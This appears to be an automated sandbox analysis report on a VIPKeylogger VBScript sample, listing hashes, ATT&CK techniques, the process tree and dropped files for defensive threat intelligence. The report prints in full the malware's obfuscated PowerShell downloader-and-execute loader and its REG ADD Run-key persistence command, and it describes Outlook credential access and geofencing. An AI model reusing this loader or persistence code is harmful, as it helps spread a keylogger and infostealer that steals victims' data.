vipkeylogger | 367cfe5599be9a9f9662b61e29c677fbdbc1fc778787025f4231f9a9bbc0f2bb

General

Target

367cfe5599be9a9f9662b61e29c677fbdbc1fc778787025f4231f9a9bbc0f2bb.vbs
Size

67KB
MD5

7c451d0c00a9b2ff5dc980e0190241f8
SHA1

d4bfc47c9a374cd30161a892f9993914a8d56966
SHA256

367cfe5599be9a9f9662b61e29c677fbdbc1fc778787025f4231f9a9bbc0f2bb
SHA512

1625e30a5e3d7190adcf3f293131009eab7a59650c835e27f5ce8c45c2cc4321c69c962c3885a43c498a7a12367cb399a07f2f44490b7f7a383ba66efab1620b
SSDEEP

1536:Gr5Ef9Zo2hIRfVqczWm/T31gtafRiys0VhyCLbkxj:Ga9jhI7qczWw16afAys0Vhxcxj

Score

10^/10

vipkeylogger collection discovery execution keylogger persistence stealer

Malware Config

Extracted

Family

vipkeylogger

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 6 IoCs

flow	pid	Process
26	3736	powershell.exe
57	4328	msiexec.exe
59	4328	msiexec.exe
62	4328	msiexec.exe
65	4328	msiexec.exe
68	4328	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Differentations = "%Virkemiddelet% -windowstyle 1 $Cece=(gi 'HKCU:\\Software\\Virtuality\\').GetValue('Khazenim');%Virkemiddelet% ($Cece)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3736	powershell.exe
5116	powershell.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	reallyfreegeoip.org
61	checkip.dyndns.org
64	reallyfreegeoip.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4328	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5116	powershell.exe
4328	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3736	powershell.exe
3736	powershell.exe
5116	powershell.exe
5116	powershell.exe
5116	powershell.exe
4328	msiexec.exe
4328	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5116	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	4328	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 960 wrote to memory of 3736	960	WScript.exe	96
PID 960 wrote to memory of 3736	960	WScript.exe	96
PID 5116 wrote to memory of 4328	5116	powershell.exe	106
PID 5116 wrote to memory of 4328	5116	powershell.exe	106
PID 5116 wrote to memory of 4328	5116	powershell.exe	106
PID 5116 wrote to memory of 4328	5116	powershell.exe	106
PID 4328 wrote to memory of 3248	4328	msiexec.exe	111
PID 4328 wrote to memory of 3248	4328	msiexec.exe	111
PID 4328 wrote to memory of 3248	4328	msiexec.exe	111
PID 3248 wrote to memory of 2912	3248	cmd.exe	113
PID 3248 wrote to memory of 2912	3248	cmd.exe	113
PID 3248 wrote to memory of 2912	3248	cmd.exe	113

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\367cfe5599be9a9f9662b61e29c677fbdbc1fc778787025f4231f9a9bbc0f2bb.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sorteringsordenens54;function Flle($unimpostrous){ .($udtrykket) ($unimpostrous)} function Hjemturen($Hvepsens){$Toreros=4;do{$Drgreb+=$Hvepsens[$Toreros];Format-List;$Toreros+=5} until(!$Hvepsens[$Toreros])$Drgreb}$theologaster=Hjemturen ' laNDistESal T ade.Grunw';$theologaster+=Hjemturen ' arte nrebBos.cStudlInd IGentepos NLaset';$Forma=Hjemturen 'E itM PodoK knz HugiHepal ignlPovlade.l/';$Elektrificere=Hjemturen 'Aca.TS.stlGennsEgre1Konc2';$Maneuverings='Post[aakinek iEProttZoop.DisaS IteETeltr Ki VCalcI,arscAdreE nkpst nO KuniCestnAmtsT Sulm AniaRec nPrewaSparg eloE I.pRAnad]Pict:P rt:,dfysSoffeCiruCNonduthanr g.iI NurTNitty F lPCorvRMultO apaTCropoAsseCAm loSaltLP.et=Clai$UnexESocil ToreNatuK TritBlderDougiSpecfToniiTi iC Udse ombrRespe';$Forma+=Hjemturen 'Gast5 Ant.O to0 Fl, Epi(MetaW KasiA,klnT,nkd.orbo ,ehwW easChel Ski NSideT est M.s1B.ok0Pers.chlo0 Rec;Cha TelWSupei aldnCarr6Tarm4Si k;Ratp FolkxO sa6 Pre4S,ej;U.nd ClubrLsepvImpr:.plf1Spyt3G un4Un e.Uefn0Bkke).igo InuiG S peGe fcEpiskTatioOlie/Inte2thyl0Over1Mate0M cr0Kara1 A t0F or1Peda thioFSp.cispedrCh meSt sf PytoRetrx Sv,/Anlg1Unfo3Acry4.emo.Kymr0';$Arbejdsfrokosternes=Hjemturen 'hyrduDislSBen ePropra am- SgeaKe sGPuddESy lnSprot';$Cytophagic=Hjemturen ' S shDechtSfortholapT nks,ogi: uca/ tre/,ymba Erhl areUmaapLat,hSautm MeniHellmMedd.Aru c octoEbb mData/ReprapseckHypopB ld/ askKSpe.aDalab NeteRenslSuf.fParirUndeiGescnHopbgminieRa prAutonBuc.e ph sacco.k mpmIntedEvocp';$Hjredel57=Hjemturen 'Inoc>';$udtrykket=Hjemturen 'Gri II.diEParaX';$Gelatinify='Subloreal';$Tarsome130='\Interruptor.Unp';Flle (Hjemturen ' err$UdstgForkL Beeo BraBSkroAGrunl Thu:UndetSti,IKinelIslaSRoboYIsenNLovrSLegaUVadedTel,VPr vaPosiLSyn,g opue Clat AfbSkni =Acin$,hugECuraNMis.V E c:XantA Ce.PtestpOkapd AmoaResptSaliaDrm +Auto$Respt S eA UnsR KarsHa vOO,gaMVernekys 1Hres3 Nor0');Flle (Hjemturen ' Udv$BrisgPreclBla.OTr.sb DefARettlG,nt: AfsLStraMW odM Skie efoLGourSFrihTDruerA mfeLunsGCasssAngs=Prim$poniCDagdyUnfoTop aoBrdlPIndihPre,A ImpgUnprIEjerc Com.Unchs,redpBis lGeosISpattTr.v(S,op$PldeHDdniJoverrKi,teAssoDCinneTwisL tod5Alka7 hag)');Flle (Hjemturen $Maneuverings);$Cytophagic=$Lmmelstregs[0];$Haematics=(Hjemturen ' H s$ SkrgTrotlN,neOPullBS.mmaExpuLfibr: ChaDDiseES gncOpkrIInteMvgmaA FartUntoiMtrinBumbGCitr=Hjsan UnpeUdklW S o- LetoGlatbNedgjHydre ndCVrd tRand ForfsIncoy Skus ToaTSi.teamtsMs.ec.Stir$VareT .alhSignEAdmiOUdliLMarto SldgPh laPrissU matSom eSnblr');Flle ($Haematics);Flle (Hjemturen ' Osm$KonkD Ta eDomicMysti PermPanta SpatS iniTaganBre gBir,.GlumHKonteSuffaStandflowe W.drnedkskomm[Besy$ForkAUnfor OribLowlePar jImpldBaudsBu dfunberSkanoNongkUndeoBarosKorrt Ve,eYnksr K.en A oe,ntos Dip] Mar= Fr,$DmpeFfastoMas,rEu emTe ua');$Bonnily226=Hjemturen ' Fo $Ind DL ngeB rbcudski .enmTromaC ift hariDrivnCalcg For.MenjDTilso Gafw SamnSpinlSecooHydra Tetd UdpFOmphi KomlBible ank( par$ForsC Stoysto tTam oBisspForuhcampaGiftgfjeli Eumcruen,Fyti$TermHbraneHom.aTaenrHvidtIndpep eunNyhe)';$Hearten=$Tilsynsudvalgets;Flle (Hjemturen 'Elek$ KvagSlanLFerfoReseb RaaADaadl lo:S.egnKernOrundnCastcAktiOfortROkseROverODekrsPretiReliVTamteA le=Omni(Qui,tKys EedonsNos t ump-Hi,sPTon ASan tVictHBacc buks$sterhHearE Kr ACoc rGoatTCrawEMicrN Kic)');while (!$Noncorrosive) {Flle (Hjemturen ' ,ld$Ga,agR dalLs eoFjogb.andaactulUnwi: BruIObj,s aguouns a rbemDattypro lFllee earnSu.nePo,t=Cu t$SeleDdiaba lemki epPretrSo puFjent SkieTronrKit nBliseSt ks') ;Flle $Bonnily226;Flle (Hjemturen 'Whad[ Isot ,erh SorrOp aENnneAHanddWoppILobuNEmamGHush. MunT RevHSummRYahfEfr,sADonaD Uns] Jau:Myxo:BogmSSagklSceneUndie IndpS pe(Gi a4 J,n0Su j0Brec0 Par)');Flle (Hjemturen '.xpl$ReapGDe.oLTickORe nBUnc ACon,LHorr:SwizNHentoFri nStenCPrs oMisrrPaulrN ncoAp.lsS bhiBo ev BesE cap=Tori( B.sTProgELa.bsTaksTTric-.rkrpB beaKalitSp lH Tek idea$AktihLor,eA toa U,crRe.dTMoroeStanNHe p)') ;Flle (Hjemturen 'Stok$NarkGFuldlRyd.OCentBLocaascralNana:SennSTilbPLam o W nr Tamv Pr otretG eriNya.is BanNProgEminot totFrukeHe eNBlege Al sWool= O,s$Lageg U.dL .iloKaraB IsoALatiL Til:J,epCNondA UdsMGlycPModvh JiqfBeo rMobn+Hndt+past%Serg$tidsLNonfMAfknmSk lEAa,rL,efoSNecttForer omEOutbGFinasG.un.R.alcEfteOAddeUPublNAmtst') ;$Cytophagic=$Lmmelstregs[$Sporvognsnettenes]}$Konferens=320220;$Sklmen=30057;Flle (Hjemturen 'Saty$DatoG ChllEgoeoSieuBArveAMediL Non: Cicd.rcaeScarR EdrIWhi,s idaINativAlbuEFortNInteesalrSA.nasF na Opsg= cep reprG PlaEskumTMale- allC Or OI,dfn ndot S,vE Ty NFoujTSynt Sa m$ForhhTi sEMy gAHygirSemit M.re Indn');Flle (Hjemturen 'Dist$TailgAf olBl ao OffbGaraa Th l vlv:FredUEl cnSttep Akrr ano B gl arliTo ax dat S.a=Atom Narr[No iSFejlylsebs enktStyre Pl.mDana.M dkCentooBestnOv,rvBalieRagnr avftMarc]Chr :Fina:WestFArberP gooE semSkydBSt,raBirksHypoeIndi6 ale4DeflSAtritJub r SfaiTrannWor,g H x(Pres$InchDHum eInfarplotiCatasmunciSub v nateGraanMi dePopps.orlsFris)');Flle (Hjemturen 'Revo$Elabg.uskLVa,iORed,b KolAIndmL er: Pavv oreasnrknStavDCellGTot AArcsnO.ergUn r colo=R ti Karr[Bests,eopySlo.sOpbetAf.rEb,gam,urn. TeaTRhineSupexSp,rTzama.GioteMononWrigcStafOWor,d .eci ordnF nkg boi]Gste:Defo:ArecATechs PreCFel iForfiOmdi. bloGGoddE Elet UneSU foT.ivrRTakti.ockNK rbg Oen(Eunu$UhiluFor N UnsPTilhRI,ndOS mmlFlleI besXKobb)');Flle (Hjemturen 'D,li$AkvaGBarbLKdehoDr gBAnteaNonel ,ia: OmttBibraSpeeseksakOv,rECreaNLandSmotoP ibi ikeLUersl AmmEBombRstivi MeleyennT ase= Ran$Blomv ndAAnd N rundP.ecGOegeaV.tiNLactgPara.Vol sd,alUK ttBMde sBluntDekorIrisIRen NLap,GSe,v( Tru$Str.KabsooAtapN Skof maeUnguRDi.teco,pN yslS Afl,Post$S atsDeadKAndrl,rremKrokE SkuN mdi)');Flle $Taskenspilleriet;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sorteringsordenens54;function Flle($unimpostrous){ .($udtrykket) ($unimpostrous)} function Hjemturen($Hvepsens){$Toreros=4;do{$Drgreb+=$Hvepsens[$Toreros];Format-List;$Toreros+=5} until(!$Hvepsens[$Toreros])$Drgreb}$theologaster=Hjemturen ' laNDistESal T ade.Grunw';$theologaster+=Hjemturen ' arte nrebBos.cStudlInd IGentepos NLaset';$Forma=Hjemturen 'E itM PodoK knz HugiHepal ignlPovlade.l/';$Elektrificere=Hjemturen 'Aca.TS.stlGennsEgre1Konc2';$Maneuverings='Post[aakinek iEProttZoop.DisaS IteETeltr Ki VCalcI,arscAdreE nkpst nO KuniCestnAmtsT Sulm AniaRec nPrewaSparg eloE I.pRAnad]Pict:P rt:,dfysSoffeCiruCNonduthanr g.iI NurTNitty F lPCorvRMultO apaTCropoAsseCAm loSaltLP.et=Clai$UnexESocil ToreNatuK TritBlderDougiSpecfToniiTi iC Udse ombrRespe';$Forma+=Hjemturen 'Gast5 Ant.O to0 Fl, Epi(MetaW KasiA,klnT,nkd.orbo ,ehwW easChel Ski NSideT est M.s1B.ok0Pers.chlo0 Rec;Cha TelWSupei aldnCarr6Tarm4Si k;Ratp FolkxO sa6 Pre4S,ej;U.nd ClubrLsepvImpr:.plf1Spyt3G un4Un e.Uefn0Bkke).igo InuiG S peGe fcEpiskTatioOlie/Inte2thyl0Over1Mate0M cr0Kara1 A t0F or1Peda thioFSp.cispedrCh meSt sf PytoRetrx Sv,/Anlg1Unfo3Acry4.emo.Kymr0';$Arbejdsfrokosternes=Hjemturen 'hyrduDislSBen ePropra am- SgeaKe sGPuddESy lnSprot';$Cytophagic=Hjemturen ' S shDechtSfortholapT nks,ogi: uca/ tre/,ymba Erhl areUmaapLat,hSautm MeniHellmMedd.Aru c octoEbb mData/ReprapseckHypopB ld/ askKSpe.aDalab NeteRenslSuf.fParirUndeiGescnHopbgminieRa prAutonBuc.e ph sacco.k mpmIntedEvocp';$Hjredel57=Hjemturen 'Inoc>';$udtrykket=Hjemturen 'Gri II.diEParaX';$Gelatinify='Subloreal';$Tarsome130='\Interruptor.Unp';Flle (Hjemturen ' err$UdstgForkL Beeo BraBSkroAGrunl Thu:UndetSti,IKinelIslaSRoboYIsenNLovrSLegaUVadedTel,VPr vaPosiLSyn,g opue Clat AfbSkni =Acin$,hugECuraNMis.V E c:XantA Ce.PtestpOkapd AmoaResptSaliaDrm +Auto$Respt S eA UnsR KarsHa vOO,gaMVernekys 1Hres3 Nor0');Flle (Hjemturen ' Udv$BrisgPreclBla.OTr.sb DefARettlG,nt: AfsLStraMW odM Skie efoLGourSFrihTDruerA mfeLunsGCasssAngs=Prim$poniCDagdyUnfoTop aoBrdlPIndihPre,A ImpgUnprIEjerc Com.Unchs,redpBis lGeosISpattTr.v(S,op$PldeHDdniJoverrKi,teAssoDCinneTwisL tod5Alka7 hag)');Flle (Hjemturen $Maneuverings);$Cytophagic=$Lmmelstregs[0];$Haematics=(Hjemturen ' H s$ SkrgTrotlN,neOPullBS.mmaExpuLfibr: ChaDDiseES gncOpkrIInteMvgmaA FartUntoiMtrinBumbGCitr=Hjsan UnpeUdklW S o- LetoGlatbNedgjHydre ndCVrd tRand ForfsIncoy Skus ToaTSi.teamtsMs.ec.Stir$VareT .alhSignEAdmiOUdliLMarto SldgPh laPrissU matSom eSnblr');Flle ($Haematics);Flle (Hjemturen ' Osm$KonkD Ta eDomicMysti PermPanta SpatS iniTaganBre gBir,.GlumHKonteSuffaStandflowe W.drnedkskomm[Besy$ForkAUnfor OribLowlePar jImpldBaudsBu dfunberSkanoNongkUndeoBarosKorrt Ve,eYnksr K.en A oe,ntos Dip] Mar= Fr,$DmpeFfastoMas,rEu emTe ua');$Bonnily226=Hjemturen ' Fo $Ind DL ngeB rbcudski .enmTromaC ift hariDrivnCalcg For.MenjDTilso Gafw SamnSpinlSecooHydra Tetd UdpFOmphi KomlBible ank( par$ForsC Stoysto tTam oBisspForuhcampaGiftgfjeli Eumcruen,Fyti$TermHbraneHom.aTaenrHvidtIndpep eunNyhe)';$Hearten=$Tilsynsudvalgets;Flle (Hjemturen 'Elek$ KvagSlanLFerfoReseb RaaADaadl lo:S.egnKernOrundnCastcAktiOfortROkseROverODekrsPretiReliVTamteA le=Omni(Qui,tKys EedonsNos t ump-Hi,sPTon ASan tVictHBacc buks$sterhHearE Kr ACoc rGoatTCrawEMicrN Kic)');while (!$Noncorrosive) {Flle (Hjemturen ' ,ld$Ga,agR dalLs eoFjogb.andaactulUnwi: BruIObj,s aguouns a rbemDattypro lFllee earnSu.nePo,t=Cu t$SeleDdiaba lemki epPretrSo puFjent SkieTronrKit nBliseSt ks') ;Flle $Bonnily226;Flle (Hjemturen 'Whad[ Isot ,erh SorrOp aENnneAHanddWoppILobuNEmamGHush. MunT RevHSummRYahfEfr,sADonaD Uns] Jau:Myxo:BogmSSagklSceneUndie IndpS pe(Gi a4 J,n0Su j0Brec0 Par)');Flle (Hjemturen '.xpl$ReapGDe.oLTickORe nBUnc ACon,LHorr:SwizNHentoFri nStenCPrs oMisrrPaulrN ncoAp.lsS bhiBo ev BesE cap=Tori( B.sTProgELa.bsTaksTTric-.rkrpB beaKalitSp lH Tek idea$AktihLor,eA toa U,crRe.dTMoroeStanNHe p)') ;Flle (Hjemturen 'Stok$NarkGFuldlRyd.OCentBLocaascralNana:SennSTilbPLam o W nr Tamv Pr otretG eriNya.is BanNProgEminot totFrukeHe eNBlege Al sWool= O,s$Lageg U.dL .iloKaraB IsoALatiL Til:J,epCNondA UdsMGlycPModvh JiqfBeo rMobn+Hndt+past%Serg$tidsLNonfMAfknmSk lEAa,rL,efoSNecttForer omEOutbGFinasG.un.R.alcEfteOAddeUPublNAmtst') ;$Cytophagic=$Lmmelstregs[$Sporvognsnettenes]}$Konferens=320220;$Sklmen=30057;Flle (Hjemturen 'Saty$DatoG ChllEgoeoSieuBArveAMediL Non: Cicd.rcaeScarR EdrIWhi,s idaINativAlbuEFortNInteesalrSA.nasF na Opsg= cep reprG PlaEskumTMale- allC Or OI,dfn ndot S,vE Ty NFoujTSynt Sa m$ForhhTi sEMy gAHygirSemit M.re Indn');Flle (Hjemturen 'Dist$TailgAf olBl ao OffbGaraa Th l vlv:FredUEl cnSttep Akrr ano B gl arliTo ax dat S.a=Atom Narr[No iSFejlylsebs enktStyre Pl.mDana.M dkCentooBestnOv,rvBalieRagnr avftMarc]Chr :Fina:WestFArberP gooE semSkydBSt,raBirksHypoeIndi6 ale4DeflSAtritJub r SfaiTrannWor,g H x(Pres$InchDHum eInfarplotiCatasmunciSub v nateGraanMi dePopps.orlsFris)');Flle (Hjemturen 'Revo$Elabg.uskLVa,iORed,b KolAIndmL er: Pavv oreasnrknStavDCellGTot AArcsnO.ergUn r colo=R ti Karr[Bests,eopySlo.sOpbetAf.rEb,gam,urn. TeaTRhineSupexSp,rTzama.GioteMononWrigcStafOWor,d .eci ordnF nkg boi]Gste:Defo:ArecATechs PreCFel iForfiOmdi. bloGGoddE Elet UneSU foT.ivrRTakti.ockNK rbg Oen(Eunu$UhiluFor N UnsPTilhRI,ndOS mmlFlleI besXKobb)');Flle (Hjemturen 'D,li$AkvaGBarbLKdehoDr gBAnteaNonel ,ia: OmttBibraSpeeseksakOv,rECreaNLandSmotoP ibi ikeLUersl AmmEBombRstivi MeleyennT ase= Ran$Blomv ndAAnd N rundP.ecGOegeaV.tiNLactgPara.Vol sd,alUK ttBMde sBluntDekorIrisIRen NLap,GSe,v( Tru$Str.KabsooAtapN Skof maeUnguRDi.teco,pN yslS Afl,Post$S atsDeadKAndrl,rremKrokE SkuN mdi)');Flle $Taskenspilleriet;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - outlook_office_path
  - outlook_win_path
  PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Differentations" /t REG_EXPAND_SZ /d "%Virkemiddelet% -windowstyle 1 $Cece=(gi 'HKCU:\Software\Virtuality\').GetValue('Khazenim');%Virkemiddelet% ($Cece)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3248
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Differentations" /t REG_EXPAND_SZ /d "%Virkemiddelet% -windowstyle 1 $Cece=(gi 'HKCU:\Software\Virtuality\').GetValue('Khazenim');%Virkemiddelet% ($Cece)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Browser Information Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1d78440de929512c2c81427409c08cc0

SHA1
51f1ddba369d2ecb8cfc2fa49dbccd779c6ae524

SHA256
b2ed378989fade7a29dfbf0e9baf5436ac554ebc571b89305a63998391126fe5

SHA512
4351c1abe9b21d7acde1759c049eaa1ca8b1723a1ad385255c880221de1e6eca3c6da8de3ffcb664a1eb2587cb905f1c37c7b507ef9142fa0d9a0bb6ea1f4e08

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnfhsqqd.svl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Interruptor.Unp

Filesize
456KB

MD5
b80d37896e1f96c1949175b648540ce7

SHA1
a8131f63ef1096fe357c055225c41d880907d7ec

SHA256
8eecc52c4779b549a34b95669602989214a9b5793d18bea45359d56e0dfae347

SHA512
367ef6f56ce1df350bb9d3776d88a523cfc67f4e8f6b4bbfdb60189f4037b8b23186312274a0dc5938bd47733bae2154c64755bb026c7806cac8f6f15d8cb6f1

Download Submit
memory/3736-10-0x0000016CA9DD0000-0x0000016CA9DF2000-memory.dmp

Filesize
136KB

Download
memory/3736-11-0x00007FFFBD820000-0x00007FFFBE2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-12-0x00007FFFBD820000-0x00007FFFBE2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-15-0x00007FFFBD820000-0x00007FFFBE2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-18-0x00007FFFBD820000-0x00007FFFBE2E1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-0-0x00007FFFBD823000-0x00007FFFBD825000-memory.dmp

Filesize
8KB

Download
memory/4328-56-0x0000000023F50000-0x0000000023F5A000-memory.dmp

Filesize
40KB

Download
memory/4328-54-0x0000000023E70000-0x0000000023EC0000-memory.dmp

Filesize
320KB

Download
memory/4328-53-0x00000000245C0000-0x0000000024782000-memory.dmp

Filesize
1.8MB

Download
memory/4328-50-0x0000000023B00000-0x0000000023B9C000-memory.dmp

Filesize
624KB

Download
memory/4328-55-0x0000000024790000-0x0000000024822000-memory.dmp

Filesize
584KB

Download
memory/4328-48-0x0000000000A10000-0x0000000001C64000-memory.dmp

Filesize
18.3MB

Download
memory/4328-49-0x0000000000A10000-0x0000000000A5A000-memory.dmp

Filesize
296KB

Download
memory/5116-19-0x0000000004E60000-0x0000000004E96000-memory.dmp

Filesize
216KB

Download
memory/5116-37-0x0000000007D60000-0x00000000083DA000-memory.dmp

Filesize
6.5MB

Download
memory/5116-39-0x00000000076E0000-0x0000000007776000-memory.dmp

Filesize
600KB

Download
memory/5116-40-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/5116-41-0x00000000083E0000-0x0000000008984000-memory.dmp

Filesize
5.6MB

Download
memory/5116-38-0x0000000006960000-0x000000000697A000-memory.dmp

Filesize
104KB

Download
memory/5116-43-0x0000000008990000-0x000000000C414000-memory.dmp

Filesize
58.5MB

Download
memory/5116-36-0x0000000006450000-0x000000000649C000-memory.dmp

Filesize
304KB

Download
memory/5116-35-0x0000000006430000-0x000000000644E000-memory.dmp

Filesize
120KB

Download
memory/5116-33-0x0000000005D90000-0x00000000060E4000-memory.dmp

Filesize
3.3MB

Download
memory/5116-22-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/5116-23-0x0000000005CE0000-0x0000000005D46000-memory.dmp

Filesize
408KB

Download
memory/5116-21-0x0000000005540000-0x0000000005562000-memory.dmp

Filesize
136KB

Download
memory/5116-20-0x0000000005640000-0x0000000005C68000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads